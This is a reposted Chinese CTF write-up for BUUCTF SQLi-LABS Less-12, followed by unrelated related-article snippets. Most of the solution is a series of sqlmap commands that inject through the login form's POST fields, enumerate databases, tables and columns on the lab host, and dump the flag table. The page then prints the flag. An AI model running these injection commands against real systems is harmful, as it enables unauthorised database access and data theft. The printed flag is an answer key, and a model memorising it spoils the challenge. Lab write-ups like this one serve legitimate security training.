首页 > 数据库 >【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-12 Writeup(SQL注入+POST请求+报错注入+双引号闭合+字符型注入)

【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-12 Writeup(SQL注入+POST请求+报错注入+双引号闭合+字符型注入)

时间:2024-09-28 21:49:43浏览次数:10  
标签:Web 12 Less -- uname 报错 nbsp 123456 注入

sqli-labs

1
点击启动靶机。

SQLi-LABS Page-1(Basic Challenges)


解法

随便提交一些数据。

审查元素。

<form action="" name="form1" method="post">
	<div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
	    <input type="text" name="uname" value="">
	</div>  
	<div> Password  : &nbsp;&nbsp;&nbsp;
		<input type="text" name="passwd" value="">
	</div><br>
	<div style=" margin-top:9px;margin-left:90px;">
		<input type="submit" name="submit" value="Submit">
	</div>
</form>

根据表单构造 POST 请求体:

passwd=123456&submit=Submit&uname=admin

用 sqlmap 扫描:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch

爆库名:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E --dbs

爆表名:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining --tables

爆列名:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining -T flag --columns

查询 flag。

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining -T flag -C flag --dump

Flag

flag{6baf6140-4646-4f31-bb61-e42b13de98a1}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

标签:Web,12,Less,--,uname,报错,nbsp,123456,注入
From: https://blog.csdn.net/qq_34988204/article/details/138676416

相关文章

  • javaweb学习4
    今天主要学习了获取数据库连接的操作和mavenmaven导入mysql和druidjar包具体的jar坐标可以去这个网站找https://mvnrepository.com/<dependencies><dependency><groupId>mysql</groupId><artifactId>mysql-connector-java</artifactId......
  • singlleton 的 bean 中注入 prototype 的bean
    在Spring中,prototypeBean注入prototypeBean和singletonBean注入prototypeBean是两个典型的场景,尤其在多线程、状态管理等复杂系统中,会有不同的行为和注意事项。1.prototypeBean中注入prototypeBean当一个prototypeBean注入另一个prototypeBean时,每次获......
  • 在Ubuntu 20.04上安装Apache Web服务器的方法
    前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。介绍ApacheHTTP服务器是世界上使用最广泛的Web服务器。它提供许多强大的功能,包括动态可加载模块、强大的媒体支持以及与其他流行软件的广泛集成。在本指南中,我们将解......
  • 基于JavaWeb技术的在线考试系统设计与实现(11551)
     有需要的同学,源代码和配套文档领取,加文章最下方的名片哦一、项目演示项目演示视频二、资料介绍完整源代码(前后端源代码+SQL脚本)配套文档(LW+PPT+开题报告)远程调试控屏包运行三、技术介绍Java语言SSM框架SpringBoot框架Vue框架JSP页面Mysql数据库IDEA/Eclipse开发四、项......
  • C# ASP.NET Core Web API 框架 实现向手机发送验证码短信
    本文章主要是在C#ASP.NETCoreWebAPI框架实现向手机发送验证码短信功能。这里我选择是一个互亿无线短信验证码平台,其实像阿里云,腾讯云上面也可以。首先我们先去互亿无线https://www.ihuyi.com/api/sms.html去注册一个账号注册完成账号后,它会送10条免费短信以及通话验证......
  • DCDC电源设计工具(软件)(一)—— WEBENCH(TI)
    目录一、简介二、在线链接三、设计界面介绍1、首界面2、芯片选择或芯片选型界面3、根据参数选择芯片及设计(1)参数输入界面(2)芯片选型界面(3)根据具体芯片型号选择设计   ①、芯片选择及参数输入界面        ②、TPS54331电源设计详情四、验证设计五、软......
  • DC00020基于springboot新闻网站系统java web项目MySQL新闻管理系统
    1、项目功能演示DC00020基于springboot新闻网站系统javaweb项目MySQL2、项目功能描述  基于springboot+vue新闻网站包括用户和系统管理员两个角色。2.1用户功能1、用户登录、用户注册2、新闻信息:点赞、点踩、收藏、查看3、用户分享:点赞、点踩、收藏、查看、添加......
  • 解决Latex soul ul参数中有宏时报错的问题
    没有宏时直接用就好了:用soul宏包解决Latex\underline换行问题但是如果里面有宏则会报错:\def\testc#{test}\ul{\testc{}}Useof\testcdoesn'tmatchitsdefinition.有两种解决方案:soulregister这种方案是非侵入式的。\soulregister\testc7来源:https://tex.stackexc......
  • ctfshow-web-信息搜集(11-17)
    web11题目提示:域名其实也可以隐藏信息,比如ctfshow.com就隐藏了一条信息。原理:通过Dns检查查询Flag。这里可以用阿里云的网站:Dns查询网站:阿里云网站运维检测平台(aliyun.com)web12题目提示:有时候网站上的公开信息,就是管理员常用密码原理:查看robots.txt文件,找到后台登录页......
  • 业务系统——钉钉调用接口上传文件报错:Could not find token at index 0
    参考:https://open.dingtalk.com/document/orgapp/initiate-approval使用的是旧版的SDK///<summary>///获取审批钉盘信息///</summary>///<paramname="userId"></param>///<paramname="to......